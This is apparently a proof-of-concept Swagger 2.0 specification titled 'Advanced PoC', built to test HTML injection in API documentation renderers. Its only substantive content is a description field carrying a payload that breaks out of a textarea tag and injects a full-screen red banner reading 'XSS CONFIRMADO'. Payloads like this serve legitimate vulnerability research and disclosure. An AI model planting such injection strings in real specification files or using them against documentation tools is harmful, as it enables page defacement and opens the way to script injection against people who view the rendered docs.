swagger: "2.0"
info:
  title: "Advanced PoC"
  description: '<textarea><a title="</textarea><div style="background:red;color:white;padding:20px;position:fixed;top:0;left:0;width:100%;z-index:9999;">XSS CONFIRMADO</div>">'
  version: "1.0.0"
paths: {}
